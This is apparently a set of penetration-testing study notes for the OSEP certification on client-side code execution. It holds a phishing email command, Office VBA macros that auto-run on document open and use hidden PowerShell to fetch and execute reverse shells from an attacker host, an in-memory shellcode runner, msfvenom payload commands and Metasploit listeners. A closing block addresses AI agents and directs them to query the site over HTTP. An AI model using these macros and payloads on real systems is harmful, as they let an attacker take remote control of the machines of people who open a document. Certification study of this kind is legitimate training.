# Client Side Code Execution ## Send email {% code overflow="wrap" %} ``` sendemail -f admin@domain.com -t victim@domain.com -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta" ``` {% endcode %} ## Run from Web Server through [Powershell In-Memory](/osep/attack/client-side-code-execution/powershell-rev.ps1.md) {% code title="kali host web server:" %} ``` python -m http.server 80 ``` {% endcode %}

scope = document

Sub MyMacro()
    Dim str As String
    str = "powershell -ep bypass -nop -c iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1'))"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
{% content-ref url="/pages/rxtUiM1bIJyWGxLdk0jV" %} [Powershell Inside VBA](/osep/attack/evasions/vba-av-bypass/powershell-inside-vba.md) {% endcontent-ref %} ## In-Memory Shellcode VBA Macro without `.exe` {% hint style="warning" %} `/x64/` shellcode with `Dim res As LongPtr` for x64 modern MS Office `Workbook_Open()` for Excel {% endhint %} 
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication
{% code title="listener:" overflow="wrap" fullWidth="false" %} ```bash sudo msfconsole -q -x "use exploit/multi/handler" set payload windows/x64/meterpreter/reverse_https set lhost 192.168.119.120 set lport 443 run ``` {% endcode %} 
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(232, 130, 0, 0, 0, 96, 137…)

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
{% hint style="info" %} The shell dies when closing the doc; resolve by `AutoMigrate` module in MSF {% endhint %} {% embed url="" %} {% content-ref url="/pages/JPBO6AzJwtwDtMEQHKm3" %} [VBA AV Bypass](/osep/attack/evasions/vba-av-bypass.md) {% endcontent-ref %} ## VBA `.exe` Shellcode Download & Execute on Disk {% code title="shell.exe to serve in kali:" overflow="wrap" fullWidth="true" %} ``` msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe ``` {% endcode %} {% code title="listener:" %} ```bash sudo msfconsole -q -x "use exploit/multi/handler" set payload windows/x64/meterpreter/reverse_https set lhost 192.168.119.120 set lport 443 run ``` {% endcode %} {% code title="kali host web server:" %} ``` python -m http.server 80 ``` {% endcode %} 
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri http://192.168.119.120/msfstaged.exe -OutFile C:\temp\msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub
[^1]: str = "powershell (New-Object System.Net.WebClient).DownloadString('') | IEX" [^2]: save the [`.ps1`](/osep/attack/client-side-code-execution/powershell-rev.ps1.md#reflection-shellcode-runner-without-add-type-stealthiest) and host in kali web server: `python -m http.server 80` can also serve txt shellcode `sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o shell.txt` [^3]: Windows Scripting Host alternative: `CreateObject("Wscript.Shell").Run str, 0` [^4]: `buf = Array(232, 130, 0, 0, 0, 96, 137…)` [^5]: execution [^6]: allocate memory [^7]: copy shellcode bytes to allocated memory (P/Invoke Win32 API) [^8]: `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication` [^9]: copy shellcode bytes to allocated memory [^10]: create the `.exe` payload and serve in kali web server: `python -m http.server 80` [^11]: `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe` [^12]: choose a commonly writable path --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://osnotes.jackielam.net/osep/attack/client-side-code-execution.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.